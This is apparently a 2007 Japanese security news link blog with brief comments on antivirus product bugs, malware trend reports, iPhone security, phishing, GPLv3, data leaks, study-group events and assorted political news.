》 久間防衛相辞任:世論読み違え、傷口広げた首相 (毎日, 7/4)。公明党との切れ目が縁の切れ目ですか。現在の自民党そのままですね。 関連:
》 ウイルスバスターで誤検出 (ワンタッチソフトインターネットニュース, 6/30)。 VSAPI 8.500 話。packer とは関係ないファイルを PAK_GENERIC.001 として検出してしまう模様。 まっちゃだいふくさん情報ありがとうございます。 関連:
》 「ウイルスバスター コーポレートエディション 8.0」の一時出荷停止 の件について、南さんから (ありがとうございます)
標記の件、
◎ 本件はUI表示上のみの不備(製品名の一部誤表示)
とのことですが、手元の Win XP のスタートメニューを 確認したところ、プログラムグループ名が 「ウイスルバスター Corp.クライアント」 となってました…。 もしかしてこれですか?
「ウイスルバスター」でぐぐると 785 件もみつかるなあ。スポンサードリンクまで表示されるし……
》 Securing Ajax Applications (O'Reilly) という本が出るのですね。
》 名前ベースのVirtualHostでそれぞれのSSLサーバ証明書を使う (Web Security Memo, 7/4)。 RFC 3546 - Transport Layer Security (TLS) Extensions というものがあるのですか。
》 安心・安全ナビ:いよいよ海開き。遊泳中の事故を防ぐため、気を付けることは。 (毎日, 7/4)。 離岸流 (長岡技術科学大学) ですか……。 離岸流について (第三管区海上保安本部)。
》 第12回まっちゃ139勉強会。 2007.08.04、大阪府寝屋川市、1000円 (学生・U20 は無料)。 「うさぎ文学日記」と「yohgaki's blog」の中の人が登場。
》 Web Application Security Forum 第5回コンファレンス (wasf.net)。 2007.07.05、東京都千代田区、一般 8,400 円、学生は無料。 7月2日締切になっていますが、席に若干余裕があるそうです。 高木さん情報ありがとうございます。
》 iPhone security settings (Xeno Kovah)
》 Incident response for the mobile enterprise (SANS ISC, 7/3)。携帯情報機器に関するフォレンジックな話。 Cell Phone Forensic Tools: An Overview and Analysis (NISC) なんて文書があるんですね。 NISC には他にも Mobile Security: Security Publications (NISC) にいろんな文書があるようで。 日本のガラパゴス携帯ではどうなんでしょう。
》 振り込め詐欺:バイク便悪用が急増 被害夫婦が手口証言 (毎日, 7/3)
》 王子製紙社員を偽札使用容疑で逮捕 「会社で作った」 (asahi.com, 7/3)
》 中国製歯磨き粉、また自主回収57万本 (asahi.com, 7/3)、クール・ホワイト (プロスタ) (医薬品等の回収に関する情報, 7/3)
》 「ウイルスバスター コーポレートエディション 8.0」の一時出荷停止 (Pintcrewブログ, 7/2) (info from まっちゃだいふくの日記)
◎ 本件はUI表示上のみの不備(製品名の一部誤表示)であり、実際の製品機能・動作に影響する問題ではございません。
このため、既に出荷済みの製品についても、本件による機能面での影響はございません。
◎ 本件は、新バージョン 8.0(2007年6月28日トレンドマイクロからの出荷開始)の、新規インストールのみに発生し、7.x以前の既存バージョン、およびアップグレードインストールでは発生いたしません。
ウイルスバスター コーポレートエディション 8.0 公開とサポートサービス開始のお知らせ (トレンドマイクロ) にも明記すればいいのに……
》 ウイルスバスター コーポレートエディション 8.0 にアップグレードする際の注意事項一覧 (トレンドマイクロ)
1. ウイルスバスター Corp. 8.0 では、Windows 9x、Me、NT、IA64をサポートしません。
(中略)
2. ウイルスバスター Corp. クライアントのタスクトレイアイコンのバルーンに、ウイルスパターンファイルや、ウイルス検索エンジンなどのバージョン情報が表示されません。
次期リリース予定のPatchにて修正予定です。
》 「WordやExcelが購入できなくなることはない」,総務省がNHK報道を否定 (日経 IT Pro, 7/2)。関連:
》 Common Updater サブシステムの初期化に失敗しました。Mcafee Framework Service が実行されていることを確認してください。Mcafee Common Framework のエラー ffffffdf が 3 で発生しました。 (マカフィー, 7/2 更新)。PowerBuilder 8.0.1, 8.0.2, 8.0.3, 8.0.4, 9.0.1 のアンインストーラの問題ですか。
》 女子更衣室侵入と誤認…男性教諭、小6男児に“レッテル” (読売, 7/3)。セクハラ申告は十分注意して確認しないとだめということですかね。いや、セクハラに限らないだろうけど。
》 ソフォス、2007年6月の『ウイルス傾向レポート』を発表 (sophos, 7/2)
ソフォスが6月中に検知した感染Webサイトの件数は1日平均 29,700件にのぼっていますが、そのうちの80%以上は正規のサイトがハッキングされたものです。
このごろは怪しくないサイトの方が危険らしい。
》 「mixi」利用して向精神薬「リタリン」違法販売、不正アクセス端緒に摘発 (Internet Watch, 7/2)
熊本県警によれば、mixiを利用した違法な薬物販売を摘発したのは全国で初めてだという。
ケーサツってさあ、ほんと初めて初めて言いたいんだねえ。
》 山谷剛史のマンスリー・チャイナネット事件簿 2007年6月 (Internet Watch, 7/3)。「高校2年生が中国政府サイトを攻撃。逮捕され話題に」など。
》 iPhoneのルートパスワードが判明か? (gigazine, 7/3)。そこに山があると登ってしまうものです。
》 Latest, Coolest Gizmos at a Malware Near You (McAfee blog, 7/2)。iphone.com を狙った phishing 話 (マルウェア Phish-BuyPhony を併用)。 Phish-BuyPhony は IE の BHO、ブラウザハイジャッカー。
》 第 5 回 Admintech.jp コミュニティ勉強会 (admintech.jp)。2007.07.07、東京都渋谷区、1000 円。
》 “治安対策”の名で進む監視体制〜出版記念講演会 (JANJAN, 7/1)
東海道山陽新幹線の新型車輌N700形の16両編成には、60台の監視カメラが設置されているそうです。JR西は設置理由について車内の秩序に役立つとしているそうですが、列車内で犯罪が増えたというデータはないそうです。
どこに設置されているんだろう。……監視する新幹線 N700系全ドアにカメラ60台 (朝日新聞 / 悪マニ, 6/8)。乗降口と運転席出入口の上部ですか。なぜそこなんだろう。 運転席出入口はともかく、乗降口……。 そんな場所で監視・抑止効果あるの?
列車の運行妨害行為や車内での犯罪を抑止するのが狙い。 (中略) 乗客による乗務員への暴行は06年度に東海道新幹線で12件、山陽で5件起きた。(中略) 昨年8月と12月には、JR西日本の普通列車内や在来線特急「サンダーバード」車内のトイレと洗面台で、女性に暴行を加えたとして男が強姦(ごうかん)容疑で逮捕された。車掌は異状に気づかず、乗客からの通報もなかったとされる。 今回、新幹線に取り付けた防犯カメラには、トイレや洗面台の様子は写らないものの、両社は「犯罪の抑止効果も含め、車内の秩序を守るのに役立つ」と説明している。
実は単に「そこにしか置ける場所がなかった」とかいう理由かなあ……。 JR に直接聞いてみるべきか。
》 豊洲環境調査—「都合のいい所だけお見せします」 (JANJAN, 7/1)。バスガイドつき……
企業内の機密情報を狙った標的型攻撃が深く静かに浸透中のようです。
APPLE-SA-2007-07-02 Version 1.1 of Mac OS X 10.4.10 Update (Apple, 2007.07.03)。 Mac OS X 10.4.10 Update 1.1 が出たそうです。 Intel Mac でオーディオ関係の不具合があった模様。PowerPC は無問題です。
中国の影、官邸による謀略……。実に興味深い展開になってきてますね。
》 ウイルス対策ソフトでウイルスは防げない (Okumura's Blog, 7/1)。あいかわらず過信している人は多いのかな。
》 HPの情報漏洩調査問題、前会長ダン氏に続いて3被告の不起訴処分が確定——残る1人も司法取引により刑が軽減される見通し (Open Tech Press, 6/30)
》 起動に関連するシステム構成の操作に使うツール (Eiji James Yoshidaの記録, 7/1)。『「システム構成ユーティリティ」という名前を忘れてしまうのでメモ』だそうです。
》 THC-HydraでSSH機能を有効にする方法 (Eiji James Yoshidaの記録, 7/1)。libssh 0.11 でないと動かないのね……。
》 アドレスバー百景 その1 (高木浩光@自宅の日記, 7/1)。
》 「情報システムに係る相互運用性フレームワーク」の公表について (経産省, 6/29)。 情報システムに係る政府調達の基本指針 (総務省, 3/1) の話。7/1 スタート。
》 ついに薬を使って記憶を消し去ることが可能に (gigazine, 7/2)。S.H.A.D.O. は 1980 年には既に使用していましたね。
》 月のナゾの発光現象「TLP」、コロンビア大学の研究者がラドン噴出説を提唱 (technobahn, 7/2)。 ラドンが噴出?! (違)
》 『環境問題はなぜウソがまかり通るのか』のウソ (JANJAN, 7/2)。「環境問題はなぜウソがまかり通るのか」というウソがなぜまかり通るのか。多くの本屋は本が売れさえすれば中身なんてどうでもいいから。
》 Sage++ (Higmmer's Edition) 公開再開にあたって (ひぐまのひまグ, 7/1)
従いまして、もし今後Sage++に関して新たな脆弱性を発見された方がおられましたら、できればIPAへの届出と共に私にもご一報頂ければ幸いです。
Sage ならともかく、Sage++ に関してそうする必要はどこにもないと思いますけど……。
》 グラスゴー空港で車が突入、炎上 ロンドンテロ未遂と関係か (CNN, 7/1)。関連:
+Lhaca 1.21 にもまだ欠陥が残っていたようで、これを修正した +Lhaca 1.23 が登場しています。
》 久間防衛相、講演で「原爆投下、しょうがない」 (asahi.com, 6/30)。目的のためには非戦闘員の大量殺戮という手段を正当化しますか。久間防衛相はそういうお考えですか。そうですか。
この論理を進めると「日本軍の行った戦争犯罪も、そういう時代だったのだから、しょうがない」になりそうで、そういう意味では従軍慰安婦話とも首尾一貫しているんですかね。
とりあえず、久間防衛相には「新訂版 戦略爆撃の思想」 でも読んで出直してほしいですね。
》 16年ぶりの改訂、「GPLv3」が正式にリリース (マイコミジャーナル, 6/30)、 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 (GNU.org)、 GPLバージョン3へアップグレードすべき理由 (Open Tech Press, 6/5)
》 フリーソフトウェア財団、iPhoneの「TiVo化」を警戒 (CNET, 6/30)
》 「7億要求された」と総連幹部…元長官ら前払い分を山分け (読売, 6/30)、 緒方容疑者に1億3千万円振り込み 4月下旬から 総連資金原資か (中日, 6/30)、「原資は総連」元社長供述 緒方容疑者への1億3000万円 (中日, 6/30)
》 高校生の個人情報1万4千人分、教諭PCから流出 愛知 (asahi.com, 6/30)。Share だそうで。
》 「ファイル交換ソフト利用で即解雇」情報流出の日本パープルが発表 (Internet Watch, 6/29)
![[セキュリティホール memo]](/%7Ekjm/security/memo/sechole-memo.gif){kind=small}
私について